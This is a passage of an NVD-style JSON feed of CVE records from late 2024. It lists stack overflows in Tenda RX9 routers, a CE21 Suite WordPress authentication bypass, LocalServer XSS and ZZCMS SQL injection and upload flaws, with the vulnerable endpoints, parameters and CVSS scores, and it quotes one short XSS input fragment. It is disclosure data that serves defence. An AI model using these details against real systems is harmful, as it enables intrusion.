"cpe:2.3:o:tenda:ac10_firmware:16.03.48.19:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac10_firmware:16.03.48.23:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:ac10:5.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac8_firmware:16.03.34.06:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac8_firmware:16.03.34.09:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:ac8:4.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-10-23T14:15Z", "lastModifiedDate" : "2024-11-01T14:03Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10281", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitee.com/GXB0_0/iot-vul/blob/master/Tenda/RX9/20/SetStaticRouteCfg.md", "name" : "https://gitee.com/GXB0_0/iot-vul/blob/master/Tenda/RX9/20/SetStaticRouteCfg.md", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.281556", "name" : "VDB-281556 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281556", "name" : "VDB-281556 | Tenda RX9/RX9 Pro SetStaticRouteCfg sub_42EEE0 stack-based overflow", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.427065", "name" : "Submit #427065 | Tenda RX9 Router RX9 Pro Firmware V22.03.02.10?RX9 Pro Firmware V22.03.02.20 Stack-based Buffer Overflow", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://www.tenda.com.cn/", "name" : "https://www.tenda.com.cn/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in Tenda RX9 and RX9 Pro 22.03.02.10/22.03.02.20. Affected is the function sub_42EEE0 of the file /goform/SetStaticRouteCfg. The manipulation of the argument list leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:rx9_pro_firmware:22.03.02.10:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:rx9_pro_firmware:22.03.02.20:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:rx9_pro:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-23T14:15Z", "lastModifiedDate" : "2024-11-01T13:52Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10282", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitee.com/GXB0_0/iot-vul/blob/master/Tenda/RX9/20/SetVirtualServerCfg.md", "name" : "https://gitee.com/GXB0_0/iot-vul/blob/master/Tenda/RX9/20/SetVirtualServerCfg.md", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.281557", "name" : "VDB-281557 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281557", "name" : "VDB-281557 | Tenda RX9/RX9 Pro SetVirtualServerCfg sub_42EA38 stack-based overflow", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.427066", "name" : "Submit #427066 | Tenda RX9 Router RX9 Pro Firmware V22.03.02.10?RX9 Pro Firmware V22.03.02.20 Stack-based Buffer Overflow", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://www.tenda.com.cn/", "name" : "https://www.tenda.com.cn/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in Tenda RX9 and RX9 Pro 22.03.02.10/22.03.02.20. Affected by this vulnerability is the function sub_42EA38 of the file /goform/SetVirtualServerCfg. The manipulation of the argument list leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:rx9_pro_firmware:22.03.02.10:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:rx9_pro_firmware:22.03.02.20:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:rx9_pro:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-23T15:15Z", "lastModifiedDate" : "2024-11-01T13:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10283", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitee.com/GXB0_0/iot-vul/blob/master/Tenda/RX9/20/SetNetControlList.md", "name" : "https://gitee.com/GXB0_0/iot-vul/blob/master/Tenda/RX9/20/SetNetControlList.md", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.281558", "name" : "VDB-281558 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281558", "name" : "VDB-281558 | Tenda RX9/RX9 Pro SetNetControlList sub_4337EC stack-based overflow", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.427064", "name" : "Submit #427064 | Tenda RX9 Router RX9 Pro Firmware V22.03.02.20 Stack-based Buffer Overflow", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://www.tenda.com.cn/", "name" : "https://www.tenda.com.cn/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in Tenda RX9 and RX9 Pro 22.03.02.20. Affected by this issue is the function sub_4337EC of the file /goform/SetNetControlList. The manipulation of the argument list leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:rx9_pro_firmware:22.03.02.20:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:rx9_pro:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-23T15:15Z", "lastModifiedDate" : "2024-11-01T14:08Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10284", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-306" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/ce21-suite/trunk/single-sign-on-ce21.php?rev=3097700#L242", "name" : "https://plugins.trac.wordpress.org/browser/ce21-suite/trunk/single-sign-on-ce21.php?rev=3097700#L242", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/45d66743-300e-480d-98b8-99dc30b6e786?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/45d66743-300e-480d-98b8-99dc30b6e786?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The CE21 Suite plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.2.0. This is due to hardcoded encryption key in the 'ce21_authentication_phrase' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ce21:ce21_suite:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.2.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-11-09T03:15Z", "lastModifiedDate" : "2025-01-29T18:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10285", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/ce21-suite/trunk/single-sign-on-ce21.php?rev=3097700#L237", "name" : "https://plugins.trac.wordpress.org/browser/ce21-suite/trunk/single-sign-on-ce21.php?rev=3097700#L237", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/ce21-suite/trunk/single-sign-on-ce21.php?rev=3097700#L281", "name" : "https://plugins.trac.wordpress.org/browser/ce21-suite/trunk/single-sign-on-ce21.php?rev=3097700#L281", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/618a9ad7-3a13-43e6-84f4-35287f07e1c0?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/618a9ad7-3a13-43e6-84f4-35287f07e1c0?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The CE21 Suite plugin for WordPress is vulnerable to sensitive information disclosure via the plugin-log.txt in versions up to, and including, 2.2.0. This makes it possible for unauthenticated attackers to log in the user associated with the JWT token." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ce21:ce21_suite:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.2.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-11-09T03:15Z", "lastModifiedDate" : "2025-01-29T18:48Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10286", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-xss-vulnerabilities-localserver", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-xss-vulnerabilities-localserver", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Cross-Site Scripting (XSS) vulnerability affecting LocalServer 1.0.9 that could allow a remote user to send a specially crafted query to an authenticated user and steal their session details through /testmail/index.php, parameter to." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ujangrohidin:localserver:1.0.9:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-23T12:15Z", "lastModifiedDate" : "2024-10-24T04:08Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10287", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-xss-vulnerabilities-localserver", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-xss-vulnerabilities-localserver", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Cross-Site Scripting (XSS) vulnerability affecting LocalServer 1.0.9 that could allow a remote user to send a specially crafted query to an authenticated user and steal their session details through /mlss/ForgotPassword, parameter ListName." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ujangrohidin:localserver:1.0.9:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-23T12:15Z", "lastModifiedDate" : "2024-10-24T04:07Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10288", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-xss-vulnerabilities-localserver", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-xss-vulnerabilities-localserver", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Cross-Site Scripting (XSS) vulnerability affecting LocalServer 1.0.9 that could allow a remote user to send a specially crafted query to an authenticated user and steal their session details through /mlss/SubscribeToList, parameter ListName." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ujangrohidin:localserver:1.0.9:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-23T12:15Z", "lastModifiedDate" : "2024-10-24T04:07Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10289", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-xss-vulnerabilities-localserver", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-xss-vulnerabilities-localserver", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Cross-Site Scripting (XSS) vulnerability affecting LocalServer 1.0.9 that could allow a remote user to send a specially crafted query to an authenticated user and steal their session details through /mlss/ManageSubscription, parameter MSubListName." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ujangrohidin:localserver:1.0.9:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-23T12:15Z", "lastModifiedDate" : "2024-10-24T04:07Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1029", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.252302", "name" : "https://vuldb.com/?ctiid.252302", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252302", "name" : "https://vuldb.com/?id.252302", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252302", "name" : "https://vuldb.com/?ctiid.252302", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252302", "name" : "https://vuldb.com/?id.252302", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Cogites eReserv 7.7.58 and classified as problematic. Affected by this issue is some unknown functionality of the file /front/admin/tenancyDetail.php. The manipulation of the argument Nom with the input Dreux\"> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252302 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cogites:ereserv:7.7.58:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-30T06:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10290", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.281559", "name" : "VDB-281559 | ZZCMS inc.php information disclosure", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281559", "name" : "VDB-281559 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?submit.427069", "name" : "Submit #427069 | zzcms 2023 Sensitive information leakage", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/LvZCh/zzcms2023/issues/1", "name" : "https://github.com/LvZCh/zzcms2023/issues/1", "refsource" : "", "tags" : [ "Broken Link" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, was found in ZZCMS 2023. This affects an unknown part of the file 3/qq-connect2.0/API/com/inc.php. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zzcms:zzcms:2023:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-10-23T15:15Z", "lastModifiedDate" : "2024-10-30T15:06Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10291", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/LvZCh/zzcms2023/issues/3", "name" : "https://github.com/LvZCh/zzcms2023/issues/3", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.281560", "name" : "VDB-281560 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.281560", "name" : "VDB-281560 | ZZCMS phome.php Ebak_DotranExecutSQL sql injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.427101", "name" : "Submit #427101 | zzcms 2023 COMMAND EXECUTION", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in ZZCMS 2023 and classified as critical. This vulnerability affects the function Ebak_DoExecSQL/Ebak_DotranExecutSQL of the file 3/Ebak5.1/upload/phome.php. The manipulation of the argument phome leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zzcms:zzcms:2023:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-23T16:15Z", "lastModifiedDate" : "2024-10-30T13:23Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10292", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/LvZCh/zzcms2023/issues/5", "name" : "https://github.com/LvZCh/zzcms2023/issues/5", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.281561", "name" : "VDB-281561 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.281561", "name" : "VDB-281561 | ZZCMS ChangeTable.php unrestricted upload", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?submit.427136", "name" : "Submit #427136 | zzcms 2023 The file contains", "refsource" : "", "tags" : [ "Third Party Advisory" 